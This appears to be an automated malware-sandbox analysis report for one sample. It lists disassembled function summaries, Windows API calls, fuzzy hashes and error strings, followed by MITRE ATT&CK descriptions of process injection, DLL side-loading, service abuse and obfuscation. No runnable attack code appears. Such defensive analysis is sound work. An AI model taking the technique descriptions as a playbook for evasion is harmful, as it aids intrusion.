Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 19c2c0adcab78d4f8dc8c398f2411b1cc7822c33d504b45323638072aec9a2f8
Instruction ID: 073d0ba9fed67ee9f9757e16c90d0d745ddd8956fe1887ddfa3fe70fac1e1566
Opcode Fuzzy Hash: 19c2c0adcab78d4f8dc8c398f2411b1cc7822c33d504b45323638072aec9a2f8
Instruction Fuzzy Hash: 48B012952A8003EC364451057C1BC3B0D5CF3C0B13330C51FBC08C1081E8440C0C2132

Function 00559684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0055966B

Part of subcall function 0055998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00559A09
Part of subcall function 0055998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00559A1A

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a3557517f47e58f39fb2723867c896b2674e4adbb4ce04bf542e5435022434a0
Instruction ID: dc15115f5e27a7cc36fb8b9cdf958fc5eec4f2ea71f83007ec8140e2ca492c75
Opcode Fuzzy Hash: a3557517f47e58f39fb2723867c896b2674e4adbb4ce04bf542e5435022434a0
Instruction Fuzzy Hash: 8AB012952A8202EC3A4451447E5BC3B0D5CF7C0B13330C51FB808D1041E8480C0D2132

Function 10010206 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 1001020E

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5905b66bebc1e570926d21d9e4b3286b345701c196fb83ae20653ad4a8786bf4
Instruction ID: 62a5c7b95c37bd68cc133e041aea9c301421c012437fbaca2513dbbfa8fc5d00
Opcode Fuzzy Hash: 5905b66bebc1e570926d21d9e4b3286b345701c196fb83ae20653ad4a8786bf4
Instruction Fuzzy Hash: 32B0112080E3E0AFE303032008A82883FB0882300030A80C3C282CA0A3E00C8A8E8B2A

Function 005114B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,005121A8,?,00000000,?,00000000,?,0051390C,00000000,?,00000104), ref: 005114E8

Part of subcall function 00513BD3: GetProcessHeap.KERNEL32(00000000,?,?,005121CC,?,7694B390,8000FFFF,?,?,00550267,?,?,00000000,00000000,8000FFFF), ref: 00513BDB
Part of subcall function 00513BD3: HeapSize.KERNEL32(00000000,?,005121CC,?,7694B390,8000FFFF,?,?,00550267,?,?,00000000,00000000,8000FFFF), ref: 00513BE2

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 9ecde2341cb07dbbada5135269409a482bf0087ddf5d012bb5a66937e5ea881e
Instruction ID: 325aa6323f7c98240e28f7d0ffca6823e77e49839223d064cd199fb834c9042a
Opcode Fuzzy Hash: 9ecde2341cb07dbbada5135269409a482bf0087ddf5d012bb5a66937e5ea881e
Instruction Fuzzy Hash: AC018937200A29ABEF105E14EC84FCE7F66BF84B50F114294FB165B151D671AC808AE8

Non-executed Functions

Function 100250E1 Relevance: 15.1, APIs: 10, Instructions: 132clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 100250F0
EmptyClipboard.USER32 ref: 10025100
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002516F
MultiByteToWideChar.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 10025193
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?), ref: 100251C3
SetClipboardData.USER32(00000001,00000000), ref: 100251D4
SetClipboardData.USER32(00000001,00000000), ref: 10025218
SetClipboardData.USER32(?,00000000), ref: 1002522F
SetClipboardData.USER32(?,00000000), ref: 10025246
CloseClipboard.USER32 ref: 1002524C

Part of subcall function 10024A4A: GlobalAlloc.KERNEL32(00000042,?,?,1002517F,00000000), ref: 10024A53
Part of subcall function 10024A4A: GlobalLock.KERNEL32(00000000), ref: 10024A60

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: Clipboard$Data$ByteCharMultiWide$Global$AllocCloseEmptyLockOpen
String ID:
API String ID: 3089114207-0
Opcode ID: 34e716af3b10cd03686dde2bc46a3a1e09d7e6c67f293165ed17bac30237bf64
Instruction ID: aaf650dadad8166d24b092df87a78aaaf8251f0a3cfd64a5622f3a05dfaeb053
Opcode Fuzzy Hash: 34e716af3b10cd03686dde2bc46a3a1e09d7e6c67f293165ed17bac30237bf64
Instruction Fuzzy Hash: 5341A075800209EFDF01DFA0DC80CBEBBB9FF04345B51452AF956620A2DB716E51DB61

Function 100050F0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 195COMMON

Download Yara Rule

APIs

?Length@CellBuffer@@QBEHXZ.TROMBONE(?), ref: 1000510C
?IsWordPartSeparator@Document@@QAE_ND@Z.TROMBONE(?,?), ref: 10005119

Part of subcall function 10004EB8: ?WordCharClass@Document@@AAE?AW4cc@CharClassify@@E@Z.TROMBONE(?), ref: 10004EBC

?IsWordPartSeparator@Document@@QAE_ND@Z.TROMBONE(?,?,?), ref: 10005132

Strings

, xrefs: 1000524F

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: Document@@Word$CharPartSeparator@$Buffer@@CellClass@Classify@@Length@W4cc@
String ID:
API String ID: 1397149334-3916222277
Opcode ID: ac35f2cb10bdd0d1253186b3d6cf73d32f33e785448ad2825c8e75a419ad3b59
Instruction ID: 4f099991b9278785bd3dfdf45280ac8e23df6d4049ab928c5bafc1802bd547b0
Opcode Fuzzy Hash: ac35f2cb10bdd0d1253186b3d6cf73d32f33e785448ad2825c8e75a419ad3b59
Instruction Fuzzy Hash: F8512B3990562262FE01DA2498416FFB39EDF471DA714806EFC827718FCE36BD4A57A0

Function 1001515C Relevance: 7.7, APIs: 5, Instructions: 195COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10015175
?BeginUndoAction@CellBuffer@@QAEXXZ.TROMBONE(00000030), ref: 10015191
?DeleteChars@Document@@QAE_NHH@Z.TROMBONE(?,?,?,?,?,00000000,00000000,?), ref: 100152D2
?InsertString@Document@@QAE_NHPBDH@Z.TROMBONE(?,?,?,?,?,?,?,00000000,00000000,?), ref: 10015307
?EndUndoAction@CellBuffer@@QAEXXZ.TROMBONE(00000030), ref: 10015366

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: Action@Buffer@@CellDocument@@Undo$BeginChars@DeleteH_prolog3InsertString@
String ID:
API String ID: 2005962043-0
Opcode ID: 7b99587472d9465949fe99ceea98438dd51dac1fc71d370d5c39c9781bb8058c
Instruction ID: 75f04530da517e8cf9c9a42fc4422e4c0510efa4d2fa56b6ec1f6a7af7d18d4b
Opcode Fuzzy Hash: 7b99587472d9465949fe99ceea98438dd51dac1fc71d370d5c39c9781bb8058c
Instruction Fuzzy Hash: 2171AA35500148DFDF05CF64C891AEE3BA5FF89394F05412AFC1AAB286EB71EA04CB90

Function 1004B121 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 378COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1004B140
_strcat.LIBCMT ref: 1004B1F2
_strlen.LIBCMT ref: 1004B1FE

Strings

;;+, xrefs: 1004B4CE

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: H_prolog3_strcat_strlen
String ID: ;;+
API String ID: 1382456698-1198638363
Opcode ID: 5253a5b6f0e6ab701a0a3c4bf07054bbe393bc54a0268cf21c3f0b7814542d9e
Instruction ID: 935ed508c876481fc8438470c514f2bc871c0797a26d754f6c45bfff46fbd887
Opcode Fuzzy Hash: 5253a5b6f0e6ab701a0a3c4bf07054bbe393bc54a0268cf21c3f0b7814542d9e
Instruction Fuzzy Hash: 15E1A274D04A89DBCF24CF95D890AEDB3B5EF09341F704039E911BB182DB306A89DB5A

Function 1005B0A6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 100597EB: _fprintf.LIBCMT ref: 10059808

_fprintf.LIBCMT ref: 1005ACB0

Strings

udl: error: ASTC_F_LOOKBACK_TESTS_CREATE at line %d: p_FamilyInfo is null, xrefs: 1005B82F
udl: ASTC_F_LOOKBACK_TESTS_CREATE: failed to create p_LBTests, xrefs: 1005B0E3
udl: bailing out of file '%s' at line %d, xrefs: 1005ACA2

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: _fprintf
String ID: udl: ASTC_F_LOOKBACK_TESTS_CREATE: failed to create p_LBTests$udl: bailing out of file '%s' at line %d$udl: error: ASTC_F_LOOKBACK_TESTS_CREATE at line %d: p_FamilyInfo is null
API String ID: 1654120334-2148968924
Opcode ID: 043da5f097d156476c2db296c17202300a4c68af384862cbef28979ca977ccd5
Instruction ID: 4ee8281849d636309109bc32eb8cec90afb8050db836709135bb4ff6ca6d3b7e
Opcode Fuzzy Hash: 043da5f097d156476c2db296c17202300a4c68af384862cbef28979ca977ccd5
Instruction Fuzzy Hash: 0D110035D04608AADF05DBA48C41BEEBBB6EF89340F10406AF54577083EF74AD888B64

Function 10027030 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10027037
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,?,00000014,00000074), ref: 100270E3
LCMapStringW.KERNEL32(00000800,01000100,?,00000001,?,00000014), ref: 10027102
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,00000014,00000000,00000000), ref: 10027119

Part of subcall function 10063EE3: _malloc.LIBCMT ref: 10063EFD

Part of subcall function 10026B4E: __EH_prolog3.LIBCMT ref: 10026B55

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: ByteCharMultiWide$H_prolog3H_prolog3_String_malloc
String ID:
API String ID: 4088310744-0
Opcode ID: 8aca4173471d03714bed936cf311bfd643e05e0725eab514b9a51ddb28f49d7f
Instruction ID: e0853e1be4e171d4a7b476723fa177a14127656b49075f5f83f7d53a3b0e4fc8
Opcode Fuzzy Hash: 8aca4173471d03714bed936cf311bfd643e05e0725eab514b9a51ddb28f49d7f
Instruction Fuzzy Hash: FB318D75E40158ABEB25CBA5DC81AEDBBBAFF48700F60416AF555A7192CB311A40CB60

Function 100170A6 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

?BeginUndoAction@CellBuffer@@QAEXXZ.TROMBONE ref: 100170C1

Part of subcall function 10010716: __EH_prolog3.LIBCMT ref: 1001071D
Part of subcall function 10010716: ?BeginUndoAction@CellBuffer@@QAEXXZ.TROMBONE(00000044,100136FC), ref: 1001074F
Part of subcall function 10010716: ?DeleteChars@Document@@QAE_NHH@Z.TROMBONE(?,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000000,00000044,100136FC), ref: 100107F1

?InsertCString@Document@@QAE_NHPBD@Z.TROMBONE(00000000,?), ref: 100170EB

Part of subcall function 1000633F: _strlen.LIBCMT ref: 10006346
Part of subcall function 1000633F: ?InsertString@Document@@QAE_NHPBDH@Z.TROMBONE(?,?,00000000), ref: 10006357

_strlen.LIBCMT ref: 100170F3
?EndUndoAction@CellBuffer@@QAEXXZ.TROMBONE(?), ref: 10017464

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: Action@Buffer@@CellDocument@@Undo$BeginInsertString@_strlen$Chars@DeleteH_prolog3
String ID:
API String ID: 1274463094-0
Opcode ID: e3cab6e9e0c4035b315cfbfcf8de56aab853d7423c8112be01707940279b3a2c
Instruction ID: 1269a76fe9799a8edd0833b1c7fab15d8ac844f4adc58db725f7961e4d6bf458
Opcode Fuzzy Hash: e3cab6e9e0c4035b315cfbfcf8de56aab853d7423c8112be01707940279b3a2c
Instruction Fuzzy Hash: 01018474B003469BDF14DF64C8967AD77A2FF84300F000869B8559F2D3CFB0AA808751

Function 1005B066 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 100597EB: _fprintf.LIBCMT ref: 10059808

_strlen.LIBCMT ref: 1005AD33
_fprintf.LIBCMT ref: 1005ACB0

Part of subcall function 10059782: _fgets.LIBCMT ref: 10059791
Part of subcall function 10059782: _strlen.LIBCMT ref: 100597A0

Strings

udl: error: ASTC_F_KEYWORD_STYLE at line %d: p_FamilyInfo is null, xrefs: 1005B820
udl: bailing out of file '%s' at line %d, xrefs: 1005ACA2

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: _fprintf_strlen$_fgets
String ID: udl: bailing out of file '%s' at line %d$udl: error: ASTC_F_KEYWORD_STYLE at line %d: p_FamilyInfo is null
API String ID: 1379636189-22277436
Opcode ID: 35704937038a6156414f3d57d779be6484df9d39f3ccc8bbb49ca14d7447cd63
Instruction ID: 3c54f605b45b9d33aeda41555335ae8cb01f4013498bc6639cde0a54dfc38d28
Opcode Fuzzy Hash: 35704937038a6156414f3d57d779be6484df9d39f3ccc8bbb49ca14d7447cd63
Instruction Fuzzy Hash: 6B11B135D04608ABDF15DF648C41AAEB7B6FF88341F1080A9F84577193EE71AD898F51

Function 1005B0ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 100597EB: _fprintf.LIBCMT ref: 10059808

_strlen.LIBCMT ref: 1005AD33
_fprintf.LIBCMT ref: 1005ACB0

Part of subcall function 10059782: _fgets.LIBCMT ref: 10059791
Part of subcall function 10059782: _strlen.LIBCMT ref: 100597A0

Strings

udl: error: ASTC_F_LOOKBACK_TESTS_INIT at line %d: p_LBTests is null, xrefs: 1005B83E
udl: bailing out of file '%s' at line %d, xrefs: 1005ACA2

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: _fprintf_strlen$_fgets
String ID: udl: bailing out of file '%s' at line %d$udl: error: ASTC_F_LOOKBACK_TESTS_INIT at line %d: p_LBTests is null
API String ID: 1379636189-86236235
Opcode ID: a6c7436824d35f4d3c93bc14857c885df91ecc8efcb5339a5b8a6a707b2c3618
Instruction ID: b9555d7816c540198e9a3922b521e5299ced3bb7b9033c3ea87362fcbacdb9f8
Opcode Fuzzy Hash: a6c7436824d35f4d3c93bc14857c885df91ecc8efcb5339a5b8a6a707b2c3618
Instruction Fuzzy Hash: 9911EF35D04608ABDF15DB648C41EEDBBB6EF89340F1080AAF54A77093EE316D888F60

Function 1005B12C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 100597EB: _fprintf.LIBCMT ref: 10059808

_strlen.LIBCMT ref: 1005AD33
_fprintf.LIBCMT ref: 1005ACB0

Part of subcall function 10059782: _fgets.LIBCMT ref: 10059791
Part of subcall function 10059782: _strlen.LIBCMT ref: 100597A0

Strings

udl: error: ASTC_F_LOOKBACK_TESTS_COUNT at line %d: p_LBTests is null, xrefs: 1005B84D
udl: bailing out of file '%s' at line %d, xrefs: 1005ACA2

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: _fprintf_strlen$_fgets
String ID: udl: bailing out of file '%s' at line %d$udl: error: ASTC_F_LOOKBACK_TESTS_COUNT at line %d: p_LBTests is null
API String ID: 1379636189-2776399434
Opcode ID: 2d534b44691b4369a6dc8de6e2fb8870a489d4904d2621cf6f572ea42095a345
Instruction ID: 76d5e904891d5c8810b83577214501ab2a923084718d4dd1837378e4ef9049fa
Opcode Fuzzy Hash: 2d534b44691b4369a6dc8de6e2fb8870a489d4904d2621cf6f572ea42095a345
Instruction Fuzzy Hash: 6611E335904618ABDF15EB648C41EEDBB76EF89340F1140AAF54577093EE716D888F60

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
